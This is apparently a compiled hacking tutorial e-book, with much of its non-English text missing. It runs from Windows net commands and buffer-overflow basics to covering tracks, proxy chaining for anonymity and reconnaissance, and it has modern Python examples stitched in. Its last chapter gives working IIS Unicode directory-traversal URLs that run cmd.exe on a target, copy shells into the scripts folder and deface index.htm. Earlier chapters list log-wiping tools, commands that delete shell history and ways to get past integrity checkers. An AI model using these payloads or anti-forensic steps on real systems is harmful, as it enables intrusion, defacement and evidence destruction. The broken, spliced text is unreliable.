/minpwage:days  Minimum number of days before a user may change the password again; 0 allows a change at any time. The range is 0 to 49,710; the default is 0.
/uniquepw:number  The user's most recent number passwords cannot be reused. The range is 0 to 24.
/domain  Performs the operation on the primary domain controller of the current domain; without it the operation applies to the local computer.
Examples:
net accounts                                    (display the current settings)
net accounts /minpwlen:7                        (passwords of at least 7 characters)
net accounts /uniquepw:5                        (the last 5 passwords cannot be reused)
net accounts /minpwage:7 /maxpwage:30 /forcelogoff:5
net accounts /minpwage:7 /maxpwage:30 /domain

Net computer
Adds or deletes a computer in the domain database (run on a domain controller).
net computer \\ComputerName {/add | /del}
Example, adding the computer Grizzlybear to the domain:
net computer \\grizzlybear /add

Net config
Displays the configurable services that are running, or displays and changes the settings of one.
net config [{server | workstation}]
net config server displays: Server computer name, Server comment, Server version, Server is active on, Server hidden (changed with /hidden), Maximum logged on users, Maximum open files per session, Idle session time (min).
net config workstation displays: Computer name, Full computer name, User name, Workstation active on, Software version, Workstation domain, Workstation domain DNS name, Logon domain, COM open timeout (sec), COM send count (byte), COM send timeout (msec).

Net continue
Resumes a service that was paused with net pause.
net continue service
service is one of: netlogon (Net Logon), "nt lm security support provider" (NT LM Security Support Provider), schedule, server, workstation.
Examples:
net continue workstation
net continue "nt lm security support provider"

Net file
Displays the names of open shared files on a server and the number of locks on each, and closes individual shared files or removes locks.
net file [ID [/close]]
ID is the file's identification number; /close closes the file and releases its locks. Without options it lists the open files (net files also works).
Sample output:
ID   Path             Username   #locks
---------------------------------------
0    C:\A_FILE.TXT    MARYSL     0
1    C:\DATABASE      DEBBIET    2
Examples:
net file              (list the open files)
net file 1 /close     (close file number 1)

Net group
Adds, displays, or modifies global groups on a domain.
net group [groupname [/comment:"text"]] [/domain]
net group [groupname {/add [/comment:"text"] | /delete} [/domain]]
net group [groupname username [...] {/add | /delete} [/domain]]
groupname is the group to add, expand or delete; given alone, it lists the group's members. /comment:"text" sets a comment of up to 48 characters. /domain applies the command to the primary domain controller of the current domain. /add creates a group or adds users to it; /delete removes a group or removes users from it. username [...] lists one or more users to add or remove, separated by spaces.
Without options net group (or net groups) lists the groups on the server; global groups are marked with an asterisk (*):
Group Accounts for \\PRODUCTION
--------------------------------
*Domain Admins
*Domain Users
Examples:
net group NOR                                    (list the members of the group nor)
net group NOR /add                               (create the group nor)
net group NOR /add /domain                       (create it on the domain controller)
net group NOR stevev ralphr jennyt /add          (add the users stevev, ralphr and jennyt to nor)
net group NOR stevev ralphr jennyt /add /domain  (the same on the domain controller)

Net help
Displays a list of the network commands and topics, or help about a specific command.
net help [command]
command /help also works. Examples: net help use, net use /help, net help /?

Net helpmsg
Explains a Windows network error number.
net helpmsg message#
Example: an attempt to start a running service gives error 2182, and net helpmsg 2182 explains it:
2182: The requested service has already been started.

Net localgroup
Adds, displays, or modifies local groups.
net localgroup [GroupName [/comment:"text"]]
Secure Shell (by ACID BURN_EG)

Secure Shell (SSH) is a program for logging into a remote machine and running commands there (a remote connection). It replaces rlogin, rsh and rcp and runs over tcp.

The BSD r-commands (rlogin, rsh and rcp) trust the remote host's name and address, and that trust has been the source of much unauthorized access to systems, up to root access. ssh authenticates both host and user and encrypts the whole session, so only authorized access to systems is possible over it.

Attacks that ssh protects against:
1. ip spoofing, where a remote host sends packets that pretend to come from another, trusted host; ssh also protects against a spoofer on the local network (localy) who pretends to be your router.
2. DNS spoofing, where an attacker forges name-server records.
If somebody manages to break the network, he can only force ssh to disconnect; the traffic stays encrypted. Ciphers available: three-key triple-DES, DES, RC4-128, TSS, Blowfish. "encryption of type none" also exists, for debugging only; never use it!
Buffer Overflows (by LAMeR)

Contents:
1. What a Buffer Overflow is
2. Processes
3. Memory management
4. Exploiting a Buffer Overflow

1. What a Buffer Overflow is
<>-----------------------
A Buffer Overflow is what made the 'code red' worm possible on MS IIS web servers. A program reserves a buffer of a fixed size for some input; if it copies more data into it than it reserved (say it reserves 15 bytes and receives 25), the surplus does not vanish: it is written past the end of the buffer over whatever follows in memory. That is the "Overflow". Memory layout of a program with three variables:

<var1><var2><vname><Other things in memory>
 10b   6b    15b

(var1 and var2 hold values; vname is 15 bytes long.) If the program copies "abcabcabcabcabcabcabcabcabc" into vname, memory becomes:

somevalue2avalusabcabcabcabcabcabcabcabcabc
<var1 ><var2><vname ><other things go here>

vname is "overflowed" and the "other things in memory" have been overwritten with the tail of the input. Every operating system has had such bugs, linux included.

2. Processes
<>----------------
A process is a running program. Operating systems run many at once ("multi-processes") by sharing the CPU between them, and each process has its own memory.

3. Memory management
<>------------------------------
Operating systems give each process virtual memory: the process sees a private address space that the OS maps onto physical memory, and the process's code, its variables and the temporary values of the functions it calls all live in that space, side by side. That is why one overflowed variable can damage its neighbours.

4. Exploiting a Buffer Overflow
<>---------------------------------
The interesting case is a program that runs as Root. If the attacker controls the input that overflows the buffer, he controls what is written over the "other things", and with care he can make the program run his own code with the program's privileges. Programmers avoid buffer overflows by checking the length of every input before copying it.
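The memory picture above, as an added example that is not part of the original chapter: a Python model of the <var1><var2><vname><other> layout with the chapter's sizes (10, 6, 15 bytes) and values (somevalue2, avalus), an unbounded copy that behaves like strcpy, and the bounded copy that fixes it. Memory is a bytearray with fixed offsets, so the corruption is reproducible and visible; the marker placed in the "other things" region is an assumption standing for whatever a real program keeps after the buffer, such as a saved return address.

```python
"""Model of the chapter's layout: <var1 10b><var2 6b><vname 15b><other things>.

Added example, not from the original page. Memory is a bytearray with fixed
offsets; unsafe_copy mirrors an unbounded strcpy, bounded_copy is the fix.
The RETADDR marker in the "other" region is constructed for illustration.
"""

LAYOUT = [("var1", 10), ("var2", 6), ("vname", 15), ("other", 18)]
OFFSETS = {}
_cursor = 0
for _name, _size in LAYOUT:
    OFFSETS[_name] = (_cursor, _size)
    _cursor += _size
MEMORY_SIZE = _cursor


class SegmentationFault(Exception):
    """Write beyond the modelled memory: a real process would crash here."""


class BufferTooSmall(Exception):
    """Raised by the bounded copy instead of corrupting the neighbours."""


def read_field(mem, field):
    off, size = OFFSETS[field]
    return bytes(mem[off:off + size])


def unsafe_copy(mem, field, data):
    """Unbounded copy like strcpy: writes len(data) bytes starting at the
    field, running over whatever follows when data is longer than the field."""
    off, _ = OFFSETS[field]
    if off + len(data) > MEMORY_SIZE:
        raise SegmentationFault(f"write of {len(data)} bytes at offset {off} leaves memory")
    mem[off:off + len(data)] = data
    return mem


def bounded_copy(mem, field, data):
    """Bounded copy: checks the length against the buffer before writing."""
    off, size = OFFSETS[field]
    if len(data) > size:
        raise BufferTooSmall(f"{len(data)} bytes do not fit in {field} ({size} bytes)")
    mem[off:off + len(data)] = data
    return mem


def fresh_memory():
    """var1 and var2 hold the chapter's values, vname is empty, other holds a marker."""
    mem = bytearray(MEMORY_SIZE)
    bounded_copy(mem, "var1", b"somevalue2")
    bounded_copy(mem, "var2", b"avalus")
    bounded_copy(mem, "other", b"RETADDR-0xdeadbeef")
    return mem


def dump(mem):
    """Field-by-field view, the way the chapter draws the layout."""
    return {name: read_field(mem, name) for name, _ in LAYOUT}


def overflow_demo():
    """The chapter's 27-byte input into the 15-byte vname."""
    return dump(unsafe_copy(fresh_memory(), "vname", b"abc" * 9))
```

overflow_demo() shows the 12 surplus bytes landing on the marker while var1 and var2, which sit before vname, are untouched: an overflow only ever runs forward. The same 27 bytes through bounded_copy raise BufferTooSmall and leave memory as it was, which is the whole fix.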

CGI (by King_abdo)

(1) What CGI is
CGI = COMMON GATEWAY INTERFACE, the interface between a web server and the programs it runs to build dynamic pages. The browser sends its request to the server with HTTP over TCP/IP (the web server listens on port 80); the server hands the request data to the CGI program and sends the program's output back as the response. The request data reaches the program through the HTTP method used:
1. GET
2. POST
3. PUT

(2) HTTP
HTTP is one of the application protocols on top of TCP/IP, alongside FTP and TELNET.
"!" (covering your tracks)

Introduction
==========
Exploits, even 0day ones, get a hacker onto a system; what gets him caught afterwards are the log files. This chapter covers 8 points: being Paranoid; protecting your own data; the LoGs; other traces; sniffers and gateway servers; the admin's tools (syslog configuration and logfile, checksum checking software); what Admins look for; log modifier tools.

Paranoid
=======
"Paranoid" (not "Paraniod"): assume that everything you do is logged and can be traced back to you. A hacker who is careless about the logs gets caught, 100%.

Protect your own data
==============
The SysAdmin who finds you will read every piece of sensitive data you kept in the clear. Encrypt:
MsDos  : SFS v.17, SecureDrive 1.4b
Amiga  : EnigmaII v1.5
Unix   : CFS v1.33
(Triple DES, IDEA, Blowfish (32 rounds)); file2file: PGP v2.6.x; Unix system login: SSH, DES Login.
Passwords of 4-8 characters are too short; use 8 and more. Keep your notes on CD rather than on the HD, and encrypt your document files too. Remember that the keyboard can be watched.

Telnet
===================
Telnet from your own box and the host's logs contain your address; think about security before you type.

LoGS
============
3 log files:
WTMP     log on/off - log in/logout + tty + host
UTMP     who is online
LASTLOG  last logins
telnet, ftp and rlogin all write them. 99.9% of the hackers who are caught are caught through these logfiles. The tool to clean them is ZAP (or ZAP2), which needs root. Default locations of the log files:
UTMP    : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
WTMP    : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log, and $home/.lastlog

Other traces
=======
Check /tmp and $HOME. Shell History files in $HOME:
sh   : .sh_history
csh  : .history
ksh  : .sh_history
bash : .bash_history
zsh  : .history
Backup Files: ~*, dead.letter, *.bak
To wipe the history automatically at logout:
mv .logout save.1
echo rm -rf .history>.logout
echo rm -rf .logout>>.logout
echo mv save.1 .logout>>.logout
Keep your tools on an encrypted partition, where the admin cannot read them. Do not leave shells running in the background. Command line parameters are visible to others on the system, so instead of
telnet http://www.host.com/ 23
type telnet, then
open http://www.host.com/
Do not plant backdoors (sub7 and the like) that point back at you.

Sniffers and gateway servers
==============================
A sniffer on the hacked system logs every password that passes, including the admin's. The admin may run one too: the sniffer output and netstat show who is online. A GateWay Server in between you and the target is one more hop, but its wtmp and lastlogs also record you, so you need root access on the gateway server to clean them. Hacking from your own Dialup server, or from a hacked system that is traced back to you, gives you away; dialup servers are watched.

lOGs: what the admin checks
********************************************
1. LSOF (List Open Files) shows which process has which file open.
2. A marker file shows everything changed since you came:
touch /tmp/check
find / -newer /tmp/check -print
Log files live in /usr/adm, /var/adm and /var/log. When logging goes to a loghost (xx@loghost) you cannot clean it from the hacked box. Clean logfiles with a text editor, or with wc and head (head -LineNumbersMinus10 keeps everything but the last 10 lines), rather than deleting them. Accounting data is cleaned with acct-cleaner from zhart. Some systems keep wtmpx and utmpx as well!

syslog configuration and logfile
************************************
The syslog function writes logs to files and to other hosts; /etc/syslog.conf says where. Look at cron (/var/spool/cron/crontabs, crontab -l as root) for periodic checks, at ~/bin of the admins for a sniffer, and for tools such as tiger, cops, spi, tripwire, l5, binaudit, hobgoblin, s3 etc. Only then think about a back door.

Admins
****************************
Things admins look at: .forward, alias, sulog (su root), the group file (admin, root, wheel, etc), passwd (accounts added with chid.c, changeid.c), .history/.sh_history/.bash_history, .profile/.login/.bash_profile and alias.

checksum checking software
************************
A checksum of each binary is recorded; a modified binary is found at the next comparison.
SOFTWARE  : STANDARD PATH                             : BINARY FILENAMES
tripwire  : /usr/adm/tcheck, /usr/local/adm/tcheck  : databases, tripwire
binaudit  : /usr/local/adm/audit                    : auditscan
hobgoblin : ~user/bin                               : hobgoblin
raudit    : ~user/bin                               : raudit.pl
l5        : compile directory                       : l5
The database may be kept on NTFS or on a CD the hacker cannot write to. After changing a binary on such a system you must either
1. update the database: "tripwire -update /bin/target", or
2. restore the original binary so the checksum matches again.
The admins' startup files (.profile, .cshrc, .login, .logout) are checked in the same way.

Administrators
=========
Administrators think about hackers the way hackers think about administrators: study how they work.

Tools
********
What log tools can do:
Change - Changes fields of the logfile to anything you want
Delete - Deletes, cuts out the entries you want
Edit - real Editor for the logfile
Overwrite - just Overwrites the entries with zero-value bytes
Don't use such software (f.e. zap)! It can be detected.
-------------------------------------------------------------
LOG MODIFIER
++++++++++
ah-1_0b.tar  Changes the entries of accounting information
clear.c      Deletes entries in utmp, wtmp, lastlog and wtmpx
cloak2.c     Changes the entries in utmp, wtmp and lastlog
invisible.c  Overwrites utmp, wtmp and lastlog with predefined values, so it's better than zap. Watch out, there are numerous inv*.c!
marryv11.c   Edit utmp, wtmp, lastlog and accounting data - best!
wzap.c       Deletes entries in wtmp
wtmped.c     Deletes entries in wtmp
zap.c        Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!
-------------------------------------------------------------
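The checksum checking described above (tripwire and its kin), as an added example that is not part of the original chapter: a Python baseline/verify tool that records a SHA-256, size and mode for every file under a directory and later reports changed, missing and added files. Everything it touches is created in a temporary directory inside the script (the trojaned bin/login, the wiped var/log/wtmp and the dropped backdoor are constructed); SHA-256 stands in for the MD5 and CRC of the 1990s tools. As the chapter notes, the database only helps if the intruder cannot rewrite it, so keep it off the box or on read-only media; the touch/find trick from the same chapter is weaker than a digest because mtimes can be reset.

```python
"""Tripwire-style integrity check: baseline file digests, then report files
that changed, vanished or appeared, the way "checksum checking software"
catches a patched binary or a wiped log.

Added example, not from the original page. Uses SHA-256; runs entirely in
a temporary directory created here, with constructed file contents.
"""
import hashlib
import json
import os
import tempfile


def digest_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    st = os.stat(path)
    # Size and mode are cheap extra tells; mtime alone is useless (it can be reset).
    return {"sha256": h.hexdigest(), "size": st.st_size, "mode": st.st_mode & 0o7777}


def build_baseline(root):
    """Digest every regular file under root; keys are /-separated relative paths."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                baseline[rel] = digest_file(full)
    return baseline


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def verify(root, baseline):
    """Compare the tree with the baseline; returns sorted lists per category."""
    current = build_baseline(root)
    return {
        "changed": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def demo():
    """Build a tree, baseline it off-tree, then play the intruder: trojan
    bin/login (same size, different bytes), delete var/log/wtmp, drop a backdoor."""
    root = tempfile.mkdtemp(prefix="integrity-")
    files = {"bin/login": b"login v1", "bin/ls": b"ls v1", "var/log/wtmp": b"\x00" * 32}
    for rel, content in files.items():                       # constructed contents
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "wb") as f:
            f.write(content)
    db = os.path.join(tempfile.mkdtemp(prefix="integrity-db-"), "baseline.json")
    save_baseline(build_baseline(root), db)
    with open(os.path.join(root, "bin/login"), "wb") as f:
        f.write(b"login v2")
    os.remove(os.path.join(root, "var/log/wtmp"))
    with open(os.path.join(root, "bin/.bd"), "wb") as f:
        f.write(b"backdoor")
    return verify(root, load_baseline(db))
```

The trojaned login keeps its size, so a size-only check would miss it; the digest does not. In practice the baseline file goes to the loghost or a CD, and the verify run is scheduled from a cron entry the intruder will also be looking for.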

Proxy - Sock Host - Wingate (anonymity)

Introduction to Proxy Server
=) proxy server (=
A proxy server is a server that stands between you and the Internet: your browser asks the proxy for a page, the proxy fetches it and hands it back. On a LAN (Local Area Network) one proxy server serves all the machines and caches the pages they fetch. Example: you request http://hackergurus.tk/; the proxy server connects to http://hackergurus.tk/ and returns the page, and the remote server sees the proxy, not you. A proxy may serve a cached copy of a page; if you are lucky it is current, if not press Refresh/Reload to fetch a new one.

Why use a Proxy Server
=) (=
An ISP (Internet Service Provider) runs proxies to reduce Traffic. For you the point is that the site you visit logs the proxy's ip, not your ip. A proxy is identified by host name and proxy port, e.g. cach.microsoft.com 80. Three things to know about a proxy:
1. its address
2. its port
3. whether it keeps Logs (most do).

Introduction to Wingate
=) Wingate (=
WinGate is a proxy server and firewall product that shares one connection (dial up modem, ISDN, xDSL, cable modem, satellite connection, or even dedicated T1 circuits) between the machines of a LAN. A wingate listens on port 23 (Telnet); connect with Telnet and the wingate lets you telnet on to another host. If the Administrator left the default setup, the wingate also accepts connections from outside the Local Network (an "open wingate"), which is used to hide an IP on ICQ, Mirc (ipspoof) and elsewhere. The Admin can DIScover this in the logs: WinGate and SyGate keep Logs, a WinGate Server for 48 hours, and ISP's keep their own.

How do I find Wingates
=) WinGate (=
Use a WinGate Scanner, search google (http://www.google.com/) for lists by ip or hostname, or scan @home networks. On Unix, by Trial and Error: telnet to port 23; an open wingate answers with its prompt and lets you (as Guest) connect on Anonymously.

Introduction to Socks Host
=) Socks Host (=
A Socks Host works like a WinGate but on port 1080; it is supported by explorer and netscape as well as Mirc, and hides your ip behind the FireWall.

Tools: Ghost Surf, Stealther. None of them is 100%.
245

"
) ( "
> <
> :<

...
Chaining Proxies



Chaining wingates
Telnet
)------------------------------------------ . proxy ip
Domain .
246

.
. Proxy
Ip Address
Domain ,,,
.
Proxy
:
http://www.multiproxy.org/anon_list.htm
http://tools.rosinstrument.com/proxy/

Group .

:
P_R_O_X_Y@yahoogroups.com



P_R_O_X_Ysubscriber@yahoogroups.com

247

Replay

)------------------------------------------=========================
. .

:
/http://www.privacy.net

/http://www.proxytester.com
Ip . !!!

..
=========================
*************************************
&&&&&&&&&&&&&&
proxy server
&&&&&&&&&&&&&&
248

. Proxy. ):
(WebSite,IRC Chat,etc
.
.


Proxy Server
...

[User]>>>>>[Proxy]>>>>>[Web Pages]
---------------Proxy Chaining
---------------


/
249

[User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination]
.


Destination = web page, Unix server, ftp server, etc
Proxy chaining

server telnet, ftp, or http
Chaining
%100


ftp

Adminstrator Logs
proxy

. Chaining Proxy

250

Logs

.
Logs
...
---------------HTTP Chaining
--------------- HTTP chaining Proxy
Address
:
_http://proxy.magusnet.com/-http://www.google.com
) (-_-
!!!
. Chaining:
_http://proxy.server1.com/-_http://proxy.server2.com/-http://www.destination.com
251


http://anon.free.anonymizer.com/http://www.google.com

) (/
http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.com
= proxy
.....
---------------Browser Chaining
--------------- .
Internet Explorer
----

213.234.124.23:80
252

213.234.124.23:
80:
ISP


Tools
Internet Options
Connections

Settings

) Address(
) Port(

213.234.124.23: 80:

.
Chaining Proixes

/
Address: 213.234.124.23:80
253

121.172.148.23:80 143.134.54.67
Port: 80
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$

&&&&&&&&&&&&&&
Wingates
&&&&&&&&&&&&&&
Wingate proxy server

)) 23 Telnet ((
Wingates
online
.
Admin .
wingate
. !!!!
ip
23 Telnet

254

WinScan
Wingate

Download
------------------------------Chaining Wingates Using Telnet
------------------------------ Wingate .

255

DoS Telnet
.....
wingate 23

Telnet

61.133.119.130 23
Telnet:
C:\WINDOWS>telnet 61.133.119.130
23


Wingate> 203.207.173.166 23
256



Wingate> 213.17.99.45 23

Wingate> 10.65.212.7 23
wingate

WinGate>arbornet.org

C:\Windows> telnet 61.133.119.130
23
Wingate>203.207.173.166 23
Wingate>135.245.18.167 23
257

Wingate>m-net.arbornet.org
Connecting to host
arbornet.org...Connected

258

"
"Logs
> . <
> :. <

.
..
Unix Multi-User Mode .
. Operation ) ( Linux
. ) . ( Unix

Unix
:
259


.
.
.
.
....
: .
( LOG File ) ...
: ...
....


IP

260

........
.
.


.
Microsoft
Windows Linux Mac

....

261


..

: .
...
) LOG
. ( File .

262

)(Web servers


) (log files

.
.
) (log file

.

.


.


- -
. :

...
. .
...
263

:

. . WIN NT

...


:
) ( )
(
...
.
. ...
..


...
264

.
. :
lastlogin.

.
.
bash_history.

contactemail.
.

Tmp trash.
. etc
.
lastlogin &.
.bash_history
. rm
bash_history.
265

:
rm .bash_history
rm .bash_history
lastlogin.
.

....
. cpanel .

..
.
localhost :
...
:

....

266



...

...
...
...
: ...
....
.
..
..
) ( HTTP Protocol
.
267


.

HTTP ....
. SOCKS Protocol
. .

. .
.
Web Proxy Service (1 .
. HTTP Protocol
WinSock Proxy Service (2
windows NT
telnet
FTP WinSock
...... Protocol
. Socks Proxy Service (3
)SSL) Secure Sockets
Layers )IIS) Internet
Information Server. Windows
NT FTP Telnet GopherIRC
RealAudio POP3
268

firewall .
... securiy
.....
. TCP/IP.
:
* (International Organization for Standardization)
** Transmission Control Protocol (TCP) ...
.

. ...
:
Ping Traceroute, DNS lookup,
Finger, Whois, LDAP, SNMP
.
. ... WIN NT :
TCP/IP . ...
. UNIX .
Router .

269




... .
). ( Router
: .
.
.....
... .
.
...
...
. :
Port 21 = FTP
Port 23 = Telnet
Port 25 = SMTP
Port 53 = DNS
Port 79 = Finger
Port 80 = HTTP
Port 110 = POP3
Port 111 = SunRPC
Port 139 = NetBIOS
Port 443 = SSL
Port 1080 = SOCKS
Port 8181 = IMail

.
.
:
... HTTPort
.
.

271

TCP/IP

HTTPort
( Proxy
) Server ISP

) )
Proxy .
HTTPort

. .
. SOCKS.
.
...

272

273

274

275

276


...
( Anonymous)
18
: ... .
AnalogX Proxy
HTTP (web), HTTPS (secure web), POP3 (receive mail), SMTP (send mail), NNTP (newsgroups), FTP (file transfer), and Socks4/4a and partial Socks5 (no UDP) protocols! It works great with Internet Explorer, Netscape, AOL, AOL Instant Messenger, Microsoft Messenger, and many more!

277


http://www.analogx.com/files/proxyi.exe
PortBlocker :

.
:
PortBlocker is configured to block the most common types of servers that might be on a system (FTP, HTTP, etc), so will not require any modification for most users. If you are running a special server of some sort, then you can easily add its ports (either TCP or UDP) to its list, and have them blocked and/or logged.
Log unauthorized port access attempts and secure internal servers from internet access easily...

PortBlocker
http://www.analogx.com/files/pblocki.exe


279

.

...
.
...

...
Proxy Log Analyzer :
:

280

1.07 MB:
http://www.mechanicalminds.com/software/pla/setup.exe
ZIP archive instructions 818 kb:
http://www.mechanicalminds.com/software/pla/pla.zip

281

.
Provides a space for you to type the address and port number of the proxy server you want to use to gain access to the Internet over HTTP, Secure, FTP, Gopher, and Socks protocols.
: .


.
282

...
.

" HTTP Port


!!"
> <
>:<
283

:
-----------------------HTTPort 3snf
-----------------------:
-----------------------



,,,,,,,,,,,,
------------------------


-----------------------
http://www.angelfire.com/tv2/ssdd63/httport3snf.zip
284

------------------------

:
------------------------ .
FAHAD

285

Port mapping

286

Add

New mapping
.

287

. .

Local port : 80
Remote host : webcache.bt.net
Remote port : 3128
OKY MAN

288

Proxy

,,,


Start

289


127.0.0.1
80


..

290

" " NeoTrace


><
>< DarK_HaCKeR :

..

..
..
..
Neo Trace Express
..
http://www.neoworx.com/download/NTX325.exe

"
"
> <

294

> :<

:
=) (=
^^^^^^^^^^^^^^^^^^^

/http://www.netcraft.com

^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
.

/http://www.almodammer.com
.
dfl;kjgk'dgjbumpipt@almodammer.c
om

295

Headers

^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Banners


..

Telnet Client
.
FTP 21

TELNET 23
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
HTTP
296

Hyper Text Transfer Protocol


8080 - 80
80 Telnet

GET /qwe HTTP/1.1
400

:
HEAD 127.0.0.1 HTTP/1.1
. ...
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
ping .
ip .
!
.
ping ipsite
=ipsite

TTL=XXX
297

= XXX
.
:
Operating System      Platform       TTL
Windows 9x/NT         Intel          32
Windows 9x/NT         Intel          128
Windows 2000          Intel          128
DigitalUnix 4.0       Alpha          60
Unisys x              Mainframe      64
Linux 2.2.x           Intel          64
FTX(UNIX) 3.3         STRATUS        64
SCO R5                Compaq         64
Netware 4.11          Intel          128
AIX 4.3.x             IBM/RS6000     60
AIX 4.2.x             IBM/RS6000     60
Cisco 11.2            7507           60
Cisco 12.0            2514           255
IRIX 6.x              SGI            60
FreeBSD 3.x           Intel          64
OpenBSD 2.x           Intel          64
Solaris 8             Intel/Spar     64
Solaris 2.x           Intel/Sparc    255

298


: ) data list or packet.
( Nodes TTL 1
tracert
traceroute


tracert ip
=ip
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^

Windows






299

:
) N-Stealth
...(
=============
( Shadow Sceurity Scanner

(
=============
( SuperScan


List (
----------------------------------------------------------------------- Linux


Nmap
) Network Maper
(

Linux
300

//
:
nmap
/
Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
  -sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
  -sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
  -sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
  -p ports to scan. Example range: '1-1024,1080,6666,31337'
  -F Only scans ports listed in nmap-services
  -v Verbose. Its use is recommended. Use twice for greater effect.
  -P0 Don't ping hosts (needed to scan http://www.microsoft.com/ and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
  -T General timing policy
  -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
  -oN/-oX/-oG Output normal/XML/grepable scan logs to
  -iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
  --interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O http://www.my.com/ 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
!!!!!!!!!
man
page ..

nmap -sS -O -vv almodammer.com
=almodammer.com


.......
^^^^^^^^^^^^^^^^^^^
=( (=
^^^^^^^^^^^^^^^^^^^
303

Linux Shell
Account
Linux Shell
.
Linux
whois
Linux


man whois
----------------------------------------------------------------- google
http://www.google.com/search?q=whois&btnG=Google+Search
.
cgi.

netcraft ..............

"
"
> <
>>P @ LH@CKERZ :

306

1
//:http
:
\
/http://www.XXX.com
/
2
3
4
5
6
7

307

8
9

10
11
11 10 :

12

:

.
.

308

"
) ( "
><
><sNiper_hEx :

309

) 13
( -:
. . . .
. CMD
.
. ECHO
CMD .

Access Denied
.
. FTP

310

.

. TFTP
.

311

.
IIS4.0 /
IIS5.0 . NT4 / Win2k

.

anonymous person

.

.

. -:
-1

312

.
. .
-2
.

.
. IIS4 / IIS5
CMD
.

. CMD
CMD




-:
313

:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+md+c:\hEx
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+rd+c:\hEx
:

:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+copy+c:\winnt\sy
314

stem32\cmd.exe+c:\inetpub\
scripts\hEx.exe
:
http://www.xxxx.com/msadc
/..
%c0%af../winnt/system32/c
md.exe?/c+move+c:\winnt\s
ystem32\cmd.exe+c:\inetpub
\scripts\hEx.exe+c:\
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+del+c:\hEx.mdb

:
http://www.xxxx.com/msadc
315

/..
%c0%af../winnt/system32/c
md.exe?/c+ren+c:\index.htm
+hEx.htm

:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+type+c:\hEx.txt

:
http://www.xxxx.com/msadc
/..
%c0%af../winnt/system32/c
md.exe?/c+echo+sNiper_hEx
+>c:\hEx.txt

316


:



:
http://www.xxxx.com/msadc
/hEx.mdb

.

-:

-:
Msadc , _vti_bin , iisadmpwd ,
_vit_admin , scripts ,
samples , cgi-bin


. ECHO


-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
\:cmd.exe?/c+dir+c

319


w3svc.exe
inetpub\scripts
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
?cmd.exe
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\w3svc.exe
w3svc.exe
inetpub\scripts

-:
http://www.xxxx.com/scrip
\:ts/w3svc.exe?/c+dir+c



320

inetpub\wwwroot\index.ht
m
-:
http://www.xxxx.com/scrip
ts/w3svc.exe?/c+echo+Hac
ked+By+sNiper_hEx+hExRa
y@Hotmail.com+>+c:\inetp
ub\wwwroot\index.htm

CMD .
CMD

-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
cmd.exe?
c+copy+c:\winnt\system32

321

\cmd.exe+c:\inetpub\script
s\cmd1.exe
. CMD
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
\:cmd1.exe?c+dir+c

Access Denied .
Access Denied

Access Denied

-:
-1 CMD
CMD1
. Copy.
-:
322

http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
?cmd.exe
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\cmd1.exe
-2 ssinc.dll
-:
o test.shtml
o
wwwroot/hEx/test.shtml
o >!#--
<--"include file="AAAA[...]AA
A
2049 .
o
http://www.xxxx.com/test.sht
ml
o .

323

o
. Access Denied
o 500

.
-3 . NC.exe

Temp

Temp .
-4
.
.
-5 root.exe :
sensepost.exe shell.exe
w3svc.exe
c:\inetpub\scripts
.

324

. FTP
Scripts CMD -1
Shell.exe
/
c+copy+c:\winnt\system32
